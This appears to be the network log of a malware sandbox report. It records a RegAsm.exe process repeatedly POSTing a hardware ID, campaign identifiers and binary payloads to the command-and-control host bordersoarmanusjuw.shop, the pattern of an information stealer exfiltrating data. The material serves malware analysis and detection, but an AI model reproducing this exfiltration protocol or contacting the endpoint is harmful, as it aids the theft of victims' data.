
                                                                                                                                            879B2FF1AFA74E08B399523B6273FBFA
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="pid"

                                                                                                                                            2
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="lid"

                                                                                                                                            H8NgCl--
                                                                                                                                            --b
                                                                                                                                            2024-04-21 13:31:24 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:24 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=6fmf8sbvg7auv2gq73998cii67; expires=Thu, 15-Aug-2024 07:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TCyfvn7sK0KBdhHzPlElq1yprM8NexhRLoyFbrEzhoNNd6Ezz3GaqqyG1F%2F5BKlLFq6fowPqT1g4TA97fIhf479xehPIYunJmy4aX6hmay%2F5AUsyjwqsZKO%2FxAzyNOP7yTbetVmor8K0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf37c3a185f-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: f
                                                                                                                                            ok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            14 | 192.168.2.4 | 49754 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:24 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC | 15331 | OUT | Data Ascii:
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="hwid"

                                                                                                                                            879B2FF1AFA74E08B399523B6273FBFA
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="pid"

                                                                                                                                            3
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="lid"

                                                                                                                                            H8NgCl--
                                                                                                                                            --b
                                                                                                                                            2024-04-21 13:31:24 UTC | 5101 | OUT | Data: binary payload
                                                                                                                                            2024-04-21 13:31:24 UTC | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:24 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=bfnoiedas2u5brlotc1iamrpfl; expires=Thu, 15-Aug-2024 07:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWxBESaRieKWv7%2BG4DW559yy8M1sulCqWXEFroAYrt1QH2d0JhTgyUsSrYCN6jow07FtXy7KsnFpfWJVCqUk8tv%2BNJV3hsbubyfQJ7yuXDxjaeDjw16CS%2F9sdaBhnm%2BX1j6Y9%2BzdtIFwNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf3ff021d80-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: f
                                                                                                                                            ok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            15 | 192.168.2.4 | 49755 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:24 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC | 15331 | OUT | Data Ascii:
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="hwid"

                                                                                                                                            879B2FF1AFA74E08B399523B6273FBFA
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="pid"

                                                                                                                                            3
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="lid"

                                                                                                                                            H8NgCl--
                                                                                                                                            --b
                                                                                                                                            2024-04-21 13:31:24 UTC | 5101 | OUT | Data: binary payload
                                                                                                                                            2024-04-21 13:31:25 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:25 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=3eknab3mo9v6m5qq1kglariq8s; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bCUwvDWs6qjlM%2BgPNR8g2lh%2FzDjg4aLMNuDPtVp5cimaMtfJwUE70%2FKgyebYaPdfMfVrInc8NOK8w5SToY1wr0fjCEElQ8qyJrQ5YCOG%2FLLkUBYTlA9QEe1EKZqW%2BCjm45BTpgx0me%2Bl7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf8c80aad62-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49756 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:24 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:24 UTC | 15331 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:24 UTC | 5101 | OUT | Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-04-21 13:31:25 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:25 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=jjfrtn0j11o36fbucpvd217v2f; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1K5HHQfdnXe1wJiBZ6VkPi%2Fw6cJ%2BRBL5JIU0F0Uiy%2F7BBirm5dPaRPS0mudHQO7gQ2BUk%2BGpLVu3kuBH6QSEJ%2BIQ2RObtrw5uS%2BidnHrlql2xL35UhDmL9tCk7XIkzraK%2FrI3xHFtfrEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf92938458f-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49757 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:24 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:24 UTC | 7091 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:25 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:25 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=sri8qvr4hkk51l6nv1m0pgckgh; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HNkgHSSTS5IUL%2F3%2FCeMFEDmJ5qLCXeqBJw%2B8ckq3NSqMjMgGkKXKv5Gq3Hu4lMRmY9uqj6S3tf15QpV0YFN3wgZXfn8FIjMjpeiEjG%2FHYW00UDKv%2BvXPto4SM5QiOC6ZUI%2BhQyoREv%2BqCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf97dffb0a0-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49758 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:25 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1411
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:25 UTC | 1411 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:26 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ojak7lidjo1v0127s7396gso4b; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dT50sg%2BKQ7K985kNaz5toxjVUF0S6CgqIvQsEdrcOK7jExoCOLMw8aCJmdwAVHyDM1FZvH9rZ%2F5MplmOHuj6ToZkj5DP%2FFfalNg5%2BeHlFh%2BOT8GBDRo19EcxbQ%2F%2B5GAL26A3Oigvo5w5iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbfd8dbfadc5-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49759 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:25 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:25 UTC | 7091 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:26 UTC | 822 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=amecd14k0ianp4f50imrf2ojnu; expires=Thu, 15-Aug-2024 07:18:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IKwPpVz%2BAsjk9N2ymnBlSk5eXeJi%2BDyPwuznhhvXB6oZb%2BhOnMIJln3zzlG2dbbs3LDRAVRf2hh3R46muEYoe%2BPkcvmqsLTr94FvBsd6oFeYpdK%2Fdl%2BRaeXxlaiTSodt%2B8srXm%2Bq1T9Ezw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbfd8e3c53f8-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49760 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:25 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:25 UTC | 7091 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:26 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=lpg1jl8l16co6el6oubr8egr6v; expires=Thu, 15-Aug-2024 07:18:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNP51u63%2Fu80tdHHHHwU3oDwyw%2BQJzNAK6CzG%2F76BOAbS1Jt8nZybYzfRTUdNtYNop3EA0Qgr9JQastyozzGXk4DxxkH%2F3rX82G%2FZKGZoCBFXN7V9I%2Bz0%2FmlBQ4X0L6HgTK3FOM2Pmw03Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbfeefcdad57-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49761 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:26 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1411
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:26 UTC | 1411 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:26 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=99sa8ftogf6k34qacmtjha17bn; expires=Thu, 15-Aug-2024 07:18:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=myV1YgETS09pKsS4TggsMj3j0YZj2TbZAUraH4iuMqpZd%2Fymwi2Nm%2FLh6DoQZi%2BoBl5kVxefBX6%2BWBN5CH7aON5g%2FuGUtNXCSrV6EzRufQptRb4tHHYBvPbHW4pNZ4kcCZcw%2Bw1ten%2FZTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc023a007bc3-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49762 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:26 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1411
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:26 UTC | 1411 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:27 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:27 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
